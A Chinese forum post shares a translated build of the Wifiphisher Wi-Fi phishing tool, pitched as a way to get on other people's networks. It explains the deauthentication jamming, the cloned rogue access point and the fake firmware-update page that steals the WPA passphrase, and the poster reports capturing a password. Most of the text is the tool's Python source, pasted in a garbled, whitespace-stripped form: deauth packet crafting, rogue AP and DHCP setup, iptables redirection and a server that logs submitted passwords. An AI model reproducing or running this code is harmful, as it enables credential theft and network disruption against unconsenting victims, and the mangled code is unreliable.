安全測試工具、蹭網(wǎng)利器wifiphisher新增漢化版

WiFi安全測試工具、蹭網(wǎng)利器（WiFiPhisher）WiFi安全測試工具、蹭網(wǎng)利器–WiFiPhisher，新增漢化版(http:/ /thread-346749-1-1.html)以前看過很多朋友有這種想法，這個是現(xiàn)成的工具。沒用過。為什么自己加密的AP變成未加密呢？是不是它設(shè)置了NATDHCP服務(wù)器轉(zhuǎn)發(fā)對應(yīng)端口數(shù)據(jù)就可以了？不明白。官方下載地 /sophron/wifiphisher，打不開的要好事做到底wifiphisher-master.zip(http:/ /forum.php?mod=attaent&aid=NTI1NjI1fDAyNjUyMzljfDE0MjYyNTA2ODl8NTU0NjN8MzQ2NzQ5)漢化版 HH_wifiphisher.zip(http:/ /forum.php?mod=atta ent&aid=NTI3MDIyfDc4ZGFiOGE4fDE0MjYyNTA2ODl8NTU0NjN8MzQ2NzQ5)開源無線安全工具Wifiphisher能夠?qū)?加密的AP無線熱點實施自動化 獲取賬戶。由于利用了社工原理實施中間人，Wifiphisher在實施攻擊時無需進(jìn)行PJ。WiFiphiser是基于MIT模式的開源軟件，運(yùn)行于KaliLinux之上Wifiphiser實施攻擊的步驟有三首先解除攻擊者與AP之間的認(rèn)證關(guān)系。Wifiphisher會向目標(biāo)AP連接的所有客戶端持續(xù)發(fā)送大量解除認(rèn)證的數(shù)據(jù)包。受攻擊者登錄假冒APWifiphisher會附近無線區(qū)域并拷貝目標(biāo)AP的設(shè)置，然后創(chuàng)建一個假冒AP，并設(shè)置NATDHCP服務(wù)器轉(zhuǎn)發(fā)對應(yīng)端口數(shù)據(jù)。那些被解除認(rèn)證的客戶端會嘗試連接假冒AP。向者將推送一個以假亂真的路由器配置頁面()。Wifiphisher會部署一個微型web服務(wù)器響應(yīng)HTTP/HTTPS請求，當(dāng)被者的終端設(shè)備請求互聯(lián)網(wǎng)頁面時，wifiphisher將返回一個以假亂真的管理頁面，以路由器固件升級為由要求重新輸入和確認(rèn)密碼。漢化版來了，本人英文有限，大家將就看＝＝翻譯不正確的地方，敬請指正我加幾張圖，詳細(xì)點在kali下，到官網(wǎng)或 附件，也可windows下載好后U盤復(fù)制進(jìn)下載到的是zip的壓縮包，不需令行解包，只接雙擊，看到里面是一個文件拖出來放到自己的文件夾中看到一個WiFiPhisher文件，這個就是要運(yùn)行的程序，它不需要安裝以管理員的運(yùn)行它，下面就是一樣的了，至于trunk ，那是因為版本不同，有的直接在WiFiPhisher目錄下，有的是WiFiPhisher下還有一個trunk目錄，程序trunk其實是一樣的在Kali軟件，解壓縮，運(yùn)要用管理員才能運(yùn)行，輸入開始掃描目標(biāo)路由器找到目標(biāo)，Ctrl+C中斷掃描，中斷后程序等待輸入目標(biāo)序輸入后回車，一個網(wǎng)卡開始下線，一個網(wǎng)卡發(fā)送，原文介紹說用戶連線后任意互聯(lián)地址都會自動打開網(wǎng)頁，這里有兩個問題用戶怎么連接過來的？我兩個網(wǎng)卡都用在KALI上了，暫時沒有多插一個作為受害者。二是http服務(wù)在8080端口上，怎么也得改為80才行啊，我的情況如圖，如何驗證是否成功呢？我只好自己打開127.0.0. 8080，并輸入密這一步是看http服務(wù)是否正常，通過何種途徑接收你看，抓到密碼了。時間有限，周末再仔細(xì)試試。＝＝＝優(yōu)點和缺點大家都點評得很到位＝＝＝＝文件wifiphisherpy #-*-coding:utf-8-*- importos importssl importre importtime importsys importSimpleHTTPServer importBaseHTTPServer importhttplib import import import import fromthreadingimportThread, fromsubprocessimportPopen,PIPE, importlogging fromscapy.allimport* conf.verb=0 #Basicconfiguration PORT=8080 SSL_PORT=443 PEM= PHISING_PAGE="access-point- DN=open(os.devnull,'w') #Console W= #white R= # G= # O= # B= # P='\033[35m' #purple C='\033[36m' #cyan GR='\033[37m' #gray T='\033[93m' #tan count= #forchannelhop APs={} #forlistingAPs hop_daemon_running=True lock=Lock() def #Createthe parser= help="Choosethechannelformonitoring.Defaultischannel help="SkipdeauthingthisMACaddress.Example:-s00:11:BB:33:44:AA" help=("Choosemonitormodeinterface." "Bydefaultscriptwillfindthemostpowerfulinterfaceand" "startsmonitormodeonit.Example:-jI help=("Choosemonitormodeinterface." "Bydefaultscriptwillfindthemostpowerfulinterfaceand" "startsmonitormodeonit.Example:-jI "-- help=("Choosetheumnumberofclientstodeauth." "Listofclientswillbeemptiedandrepopulatedafter" "hittingthelimit.Example:-m help=("Donotclearthedeauthlistwhen um(-m)number" "ofclient/APcombosisreached.Mustbeusedinconjunction" "with-m.Example:-m10- help=("Choosethetimeintervalbetweenpacketsbeingsent." "Defaultisasfastaspossible.Ifyouseescapy" "errorslike'nobufferspace'try:-t help=("Choosethenumberofpacketstosendineachdeauthburst." "Defaultvalueis1;1packettotheclientand1packetto" "theAP.Send2deauthpacketstotheclientand2deauth" "packetstotheAP:-p help=("Skipthedeauthenticationpacketstothebroadcastaddressof" "theaccesspointsandonlysendthemtoclient/AP help="EntertheMACaddressofaspecificaccesspointtotarget" returnparser.parse_args() classSecureHTTPServer(BaseHTTPServer.HTTPServer): SimpleHTTPserverthatextendstheSimpleHTTPServer moduletosupporttheSSLprotocol. Onlytheserverisauthenticatedwhiletheclientremains unauthenticated(i.e.theserverwillnotrequestaclient Italsoreactstoself.stopflag. definit(self,server_address, SocketServer.BaseServer.init(self,server_address, self.socket= socket.socket(self.address_family, def Handlesonerequestatatimeuntil self.stop= whilenot classSecureHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): L000161RequesthandlerfortheHTTPSserver.ItrespondstoL000162everythingwitha301redirectiontotheHTTPserver. L000164def Sendsa200OKresponse,andsetsserver.stopto self.server.stop=True def self.connection= self.rfile=socket._fileobject(self.request,"rb",self.rbufsize) self.wfile=socket._fileobject(self.request,"wb",self.wbufsize) def self.send_header('Location',':'+ deflog_message(self,format, classHTTPServer(BaseHTTPServer.HTTPServer): HTTPserverthatreactstoself.stopflag. def Handleonerequestatatimeuntil self.stop= whilenotself.stop: classHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): RequesthandlerfortheHTTPserverthatlogsPOSTrequests. def Sendsa200OKresponse,andsetsserver.stopto self.server.stop=True def ifself.path== wifi_webserver_tmp="/tmp/wifiphisher- withopen(wifi_webserver_tmp,"a+")as log_file.write('['+T+'*'+W+']'+O+"GET"+T self.client_address[0]+W+ self.path= self.path="%s/%s"%(PHISING_PAGE,self.path) if ifnot f= self.send_header('Content-type','text- #Sendfilecontentto #Leavebinaryandotherdatatodefault def form= environ={'REQUEST_METHOD': foritemin if ifre.match("\A[\x20-\x7e]+\Z", self.send_header('Location', wifi_webserver_tmp="/tmp/wifiphisher- withopen(wifi_webserver_tmp,"a+")as log_file.write('['+T+'*'+W+']'+O+"POST" T+self.client_address[0] R+"password="+item.value W+ deflog_message(self,format, defstop_server(port=PORT,ssl_port=SSL_PORT): SendsQUITrequesttoHTTPserverrunningonlocalhost:<port> conn=httplib.HTTPConnection("localhost:%d"% conn.request("QUIT", conn=httplib.HTTPSConnection("localhost:%d"% conn.request("QUIT", def Shutdowns os.system('iptables- os.system('iptables-X') os.system('iptables-tnat-F') os.system('iptables-tnat-X') os.system('pkillairbase-ng') os.system('pkill os.system('pkill ifos.path.isfile('/tmp/wifiphisher-jammer.tmp'): ifos.path.isfile('/tmp/hostapd.conf'): print'\n['+R+'!'+W+'] defL000303interfaces={"monitor":[],"managed":[],"all":[]}L000304proc=Popen(['iwconfig'],stdout=PIPE,stderr=DN)L000305forlinein iflen(line)== #Isn'tanempty ifline[0]!=' #Doesn'tstartwith wired_search=re.search('eth[0-9]|em[0-9]|p[1-9]p[1-9]', ifnot #Isn't iface=line[:line.find(' #isthe if'Mode:Monitor'in elif'IEEE802.11'in returninterfaces defget_iface(mode="all", ifaces= foriin ifinotin return returnFalse def monitors= formin if'mon'in Popen(['airmon-ng','stop',m],stdout=DN, Popen(['ifconfig',m,'down'],stdout=DN, Popen(['iwconfig',m,'mode','managed'],stdout=DN, Popen(['ifconfig',m,'up'],stdout=DN,stderr=DN) def '''returnthewifiinternetconnected inet_iface=None ifos.path.isfile("/sbin/ip")== proc=Popen(['/sbin/ip','route'],stdout=PIPE,stderr=DN) def_route= municate()[0].split('\n')#[0].split() forlineindef_route: if'wlan'inlineand'defaultvia'in line= inet_iface= ipprefix= #Justcheckingifit's192,172,or returnL000352 proc=open('/proc/net/route', default= if"wlan"in def_route= x= res=[''.join(i)foriinzip(x, d=[str(int(i,16))foriin returninet_iface returnFalse def '''returnthewifiinternetconnectedIP ipprefix= ifos.path.isfile("/sbin/ip")== proc=Popen(['/sbin/ip','route'],stdout=PIPE,stderr=DN) def_route= municate()[0].split('\n')#[0].split() forlineindef_route: if'wlan'inlineand'defaultvia'in line= inet_iface= ipprefix= #Justcheckingifit's192,172,or returnL000376 proc=open('/proc/net/route', default= if"wlan"in def_route= x= res=[''.join(i)foriinzip(x, d=[str(int(i,16))foriin returnipprefix returnFalse def chan= err= while err= ifchan> chan= chan=chan+ channel= iw= ['iw','dev',mon_iface,'set','channel', stdout=DN, forline #iwdevshouldntdisplayoutputunlessthere'san iflen(line)> with err= '['+R+'-'+W+']Channelhopfailed:' R+line+W+ 'Trydisconnectingthemonitormode\'sparent' 'interface(e.g. 'fromthenetworkifyouhavenot except defsniffing(interface, '''Thisexistsforif/whenIgetdeauthworking sothatit'seasytocallsniff()inathread''' sniff(iface=interface,prn=cb,store=0) def globalAPs, ifpkt.haslayer(Dot11Beacon)or ap_channel= except = mac= iflen(APs)> fornumin if in count+= APs[count]=[ap_channel,e, def globalAPs, print('['+G+'+'+W+']Ctrl-Catanytimetocopyanaccess' 'pointfrom print print forapin print(G+str(ap).ljust(2)+W+'-'+APs[ap][0].ljust(2)+'-' T+APs[ap][1]+W) def globalAPs, copy= whilenot copy= ('\n['+G+'+'+W+']Choosethe['+G+'num'+W ']oftheAPyouwishtocopy: copy= except copy= channel= = ifstr(e)== e=' mac= returnchannel, , except returncopy_AP() defstart_ap(mon_iface,channel, , print'['+T+'*'+W+']Startingthefakeaccess config= withopen('/tmp/hostapd.conf','w')as dhcpconf.write(config%(mon_iface,e ,channel)) Popen(['hostapd','/tmp/hostapd.conf'],stdout=DN, #CopiedfromPwnstarwhichsaiditwas except cleanup(None,None) def config= #disablesdnsmasqreadinganyotherfiles #/etc/resolv.conffor #Interfacetobind #Specify ipprefix=L000514ifipprefix=='19'oripprefix=='17'ornotipprefix: withopen('/tmp/dhcpd.conf','w')asdhcpconf: #subnet,range,router,dns dhcpconf.write(config%(interface, elifipprefix== withopen('/tmp/dhcpd.conf','w')as dhcpconf.write(config%(interface, return'/tmp/dhcpd.conf' defdhcp(dhcpconf, os.system('echo> dhcp=Popen(['dnsmasq','-C',dhcpconf],stdout=PIPE, ipprefix= Popen(['ifconfig',str(mon_iface),'mtu','1400'],stdout=DN, ifipprefix=='19'oripprefix=='17'ornot ['ifconfig',str(mon_iface),'up', 'netmask', ('routeadd-netnetmask' 'gw ['ifconfig',str(mon_iface),'up', 'netmask', ('routeadd-netnetmask' 'gw def interfaces= scanned_aps= foriin ifiin count= proc=Popen(['iwlist',i,'scan'],stdout=PIPE, forline if'-Address:'in #firstlineiniwlistscanforanew count+= scanned_aps.append((count, print('['+G+'+'+W+']Networksdiscoveredby +G+i+W+':'+T+str(count)+ iflen(scanned_aps)> interface= returninterface returnFalse def print('['+G+'+'+W+']Startingmonitormodeoff +G+interface+ os.system('ifconfig%sdown'%interface) os.system('iwconfig%smodemonitor'%interface) os.system('ifconfig%sup'%interface) return except sys.exit('['+R+'-'+W+']Couldnotstartmonitormode') #WifiJammer def Firsttimeitrunsthroughthechannelsitstaysoneachchannel 5secondsinordertopopulatethedeauthlist Afterthatitgoesasfastasitcan globalmonchannel,first_pass channelNum= err=None while if with monchannel= channelNum+= ifchannelNum> channelNum= with first_pass= with monchannel=str(channelNum) proc= ['iw','dev',mon_iface,'set','channel', forline iflen(line)> #iwdevshouldntdisplayoutputunlessthere'san err=('['+R+'-'+W+']Channelhopfailed: +R+line+ if #Forthefirstchannelhopthru,donot iffirst_pass== def addr1=destination,addr2=source,addr3=b,addr4=bofgateway ifthere'smulti-APstoonegateway.Constantlyscanstheclients_APslist andstartsathreadtodeautheachinstance pkts=[] iflen(clients_APs)> with forxin client= ap= ch= Can'taddaRadioTap()layerasthefirstlayerorit's malformedAssociationrequest Appendthepacketstoanewlistsowedon'thavetohog locktype=0, ifch==monchannel: deauth_pkt1=Dot11( addr3=ap)/ deauth_pkt2= addr3=client)/ iflen(APs)> ifnot with forain ap= ch= ifch== deauth_ap= addr3=ap)/ iflen(pkts)> #prevent'nobufferspace'scapyerror ifnot args.timeinterval= ifnot args.packets=1 forpin send(p,inter=float(args.timeinterval),count=int(args.packets)) def wifi_jammer_tmp="/tmp/wifiphisher-jammer.tmp" withopen(wifi_jammer_tmp,"a+")aslog_file: with forcain iflen(ca)> ('['+T+'*'+W+']'+O+ca[0]+W '-'+O+ca[1]+W+'-'+ca[2].ljust(2) '-'+T+ca[3]+W+ '['+T+'*'+W+']'+O+ca[0]+W '-'+O+ca[1]+W+'-'+ with forapin '['+T+'*'+W+']'+O+ap[0]+W '-'+ap[1].ljust(2)+'-'+T+ap[2]+W+ #print'' defnoise_filter(skip,addr1, #Broadcast,broadcast,IPv6mcast,spanningtree,spanningtree, # ignore= '33:33:00:', if foriin ifiinaddr1oriin returnTrue def Lookfordot11packetsthataren'ttoorfrombroadcastaddress, aretype1or2(control,data),andappendtheaddr1andaddr2 tothelistofdeauthtargets. globalclients_APs,APs #returntheseif'skeeclients_APsthesameorjustreset #Iliketheideaofthetoolrepopulatingthevariable if if iflen(clients_APs)>int(args. iflen(clients_APs)> with clients_APs= APs= We'readdingtheAPandchanneltothedeauthlistattimeofcreation ratherthanupdatingontheflyinordertoavoidcostlyforloops thatrequirealock. if ifpkt.addr1and #FilteroutallotherAPsandclientsif if ifargs.accesspointnotin[pkt.addr1, #Checkifit'saddedtoourAP ifpkt.haslayer(Dot11Beacon)or APs_add(clients_APs,APs,pkt,args.channel) #Ignoreallthenoisypacketslikespanning ifnoise_filter(args.skip,pkt.addr1, #Management=1,data= ifpkt.typein[1, clients_APs_add(clients_APs,pkt.addr1,pkt.addr2) defAPs_add(clients_APs,APs,pkt, =pkt[Dot11Elt].info = #Thankstoairoscapyfor ap_channel=str(ord(pkt[Dot11Elt:3].info)) #Prevent5GHzAPsfrombeingthrownintothemix chans=['1','2','3','4','5','6','7','8','9','10','11'] ifap_channelnotin if ifap_channel!= except iflen(APs)== with return , forbin if in with returnAPs.append([b,ap_channel,]) defclients_APs_add(clients_APs,addr1, iflen(clients_APs)== iflen(APs)== with returnclients_APs.append([addr1,addr2, AP_check(addr1,addr2) #Appendnewclients/APsifthey'renotinthe forcain ifaddr1incaandaddr2in iflen(APs)> returnAP_check(addr1, with returnclients_APs.append([addr1,addr2,monchannel]) defAP_check(addr1, forapin ifap[0].lower()inaddr1.lower()orap[0].lower()in with returnclients_APs.append([addr1,addr2,ap[1],ap[2]]) def s=socket.socket(socket.AF_INET, info=fcntl.ioctl(s.fileno(),0x8927,struct.pack('256s', mac=''.join(['%02x:'%ord(char)forcharininfo[18:24]])[:- print('['+G+'*'+W+']Monitormode:'+G +mon_iface+W+'-'+O+mac+W) returnmac def Weneedthisheretorunitfromathread. sniff(iface=mon_iface,store=0,prn=cb) def ifnot install= ('['+T+'*'+W+']isc-dhcp-servernotfound' 'in/usr/sbin/hostapd,installnow?[y/n] ifinstall== os.system('apt-get-yinstall sys.exit(('['+R+'-'+W+']hostapd'+ 'notfoundin/usr/sbin/hostapd')) ifnotos.path.isfile('/usr/sbin/hostapd'): '\n['+R+'-'+W+']Unabletoinstallthe\'hostapd\'package!\n' '['+T+'*'+W+']Thisprocessrequiresapersistentinternetconnection!\n' 'Pleasefollowthelinkbelowtoconfigureyoursources.list\n' B+'\n'+W '['+G+'+'+W+']Runapt-getupdateforchangestotakeeffect.\n' '['+G+'+'+W+']Rerunthescriptagaintoinstallhostapd.\n' '['+R+'!'+W+'] if =="main #Parse args= #Areyou if sys.exit('['+R+'-'+W+']Pleaserunas #Gethostapdif #StartHTTPserverinabackground Handler= httpd=HTTPServer(("",PORT), print'['+T+'*'+W+']StartingHTTPserveratport'+ webserver= webserver.daemon= #StartHTTPSserverinabackground Handler= httpd=SecureHTTPServer(("",SSL_PORT),Handler) print('['+T+'*'+W+']StartingHTTPSserveratport'+ secure_webserver= secure_webserver.daemon=True #Get ifnot inet_iface= mon_iface=get_iface(mode="monitor", iface_to_monitor= mon_iface= iface_to_monitor= ifnot if iface_to_monitor= iface_to_monitor= ifnotiface_to_monitorandnot ('['+R+'-'+W ']Nowirelessinterfacesfound,bringoneupandtry mon_iface= wj_iface= ifnot ap_iface=get_iface(mode="managed", ap_iface=args.apinterface Wegottheinterfacescorrectlyatthispoint.Monitormon_iface& theAP #Setiptablerulesandkernel ('iptables-tnat-APREROUTING-ptcp--dport80-jDNAT' '--to-destination:%s'%PORT) ('iptables-tnat-APREROUTING-ptcp--dport443-jDNAT' '--to-destination:%s'%SSL_PORT) ['sysctl','-w', print'['+T+'*'+W+']Clearedleases,startedDHCP,setupiptables' #Copy hop=Thread(target=channel_hop, hop.daemon= sniffing(mon_iface,targeting_cb) channel,e,ap_mac=copy_AP() hop_daemon_running=False #Start dhcpconf= dhcp(dhcpconf, start_ap(ap_iface,channel,e, print('['+T+'*'+W+']'+T +W+'setuponchannel' T+channel+W+'via'+T+mon_iface W+'on'+T+str(ap_iface)+W) clients_APs= APs= args= args.accesspoint= args.channel= monitor_on= conf.iface= mon_MAC= first_pass= monchannel= #Startchannel hop=Thread(target=channel_hop2, hop.daemon= #Start sniff_thread=Thread(target=sniff_dot11, sniff_thread.daemon= #Main while print"Jammingdevices: ifos.path.isfile('/tmp/wifiphisher- proc=check_output(['cat','/tmp/wifiphisher- lines= lines+=["\n"]*(5- lines=["\n"]* forlin print print"DHCPLeases: if proc=check_output(['cat', lines= lines+=["\n"]*(5- lines=["\n"]* forlin print print"HTTPrequests: ifos.path.isfile('/tmp/wifiphisher- proc= ['tail','-5','/tmp/wifiphisher- lines= lines+=["\n"]*(5- lines=["\n"]* forlin print #Wegotavictim.Shutdown if"password"in except README.mdAboutWifiphisherisasecuritytoolthatmountsfastautomatedphishingattacksagainstWiFinetworksinordertoobtainsecretpassphrasesandothercredentials.Itisasocialengineeringattackthatunlikeothermethodsitdoesnotincludeanybruteforcing.Itisaneasywayforobtainingcredentialsfromcaptiveportalsandthirdpartyloginpagesor 2secretpassphrases.WifiphisherworksonKaliLinuxandislicensedundertheMITlicense.Fromthevictim's,theattackmakesuseinthreephases:Victimisbeingdeauthenticatedfromheraccesspoint.Wifiphishercontinuouslyjamsallofthetargetaccesspoint'swifideviceswithinrangebysendingdeauthpacketstotheclientfromtheaccesspoint,totheaccesspointfromtheclient,andtothebroadcastaddressaswell.Victimjoinsarogueaccesspoint.Wifiphishersniffstheareaandcopiesthetargetaccesspoint'ssettings.Itthencreatesaroguewirelessaccesspointthatismodeledonthetarget.ItalsosetsupaNAT/DHCPserverandforwardstherightports.Consequently,becauseofthejamming,clientswillstartconnectingtotherogueaccesspoint.Afterthisphase,thevictimisMiTMed.Victimisbeingservedarealisticrouterconfig-lookingpage.wifiphisheremploysaminimalwebserverthatrespondstoHTTP&HTTPSrequests.Asso